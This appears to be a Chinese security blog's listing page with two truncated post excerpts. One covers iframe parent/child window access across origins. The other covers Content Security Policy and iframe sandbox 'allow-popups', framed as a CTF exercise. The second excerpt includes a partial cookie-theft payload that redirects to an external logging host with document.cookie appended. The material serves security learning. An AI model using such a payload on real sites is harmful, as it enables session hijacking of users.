摘要:
iframe的子操作父窗口,父操作子窗口: test.php: a.html 子操作父窗口: 父操作子: 以上是在同域下操作的,可对不同页面读写操作, 如果将iframe的srcs修改为<iframe src="http://www.123.com/csp/a.html" id="iframe">< 阅读全文
摘要:
iframe.php代码如下: allow-popups开启时,window.open就可以打开新的窗口。 看csp规则,默认是在当前域内,如果这是一个ctf题的话,就很简单了,window.location.href='http://aa.xxxx.ceye.io?'+document.cooki 阅读全文